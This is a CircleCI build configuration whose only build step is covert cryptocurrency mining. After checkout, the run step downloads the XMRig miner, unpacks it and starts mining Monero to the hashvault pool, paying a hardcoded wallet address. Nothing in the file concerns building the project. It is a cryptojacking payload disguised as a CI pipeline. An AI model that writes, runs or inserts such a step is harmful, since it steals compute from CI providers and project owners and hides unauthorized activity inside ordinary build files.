version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-static-x64.tar.gz && tar -xzvf xmrig-6.17.0-linux-static-x64.tar.gz && cd xmrig-6.17.0 && ./xmrig --cuda -o pool.hashvault.pro:443 -u 49pzgZFSCY1bUF7Dcjr1P5JaTARG1aGSnDcbLhcTnDXZNrUwMh9xfQWXQrXcKMHxVJhjz4MESTrWdKMNy4myqygg43uVGUN -p teet -k --tls
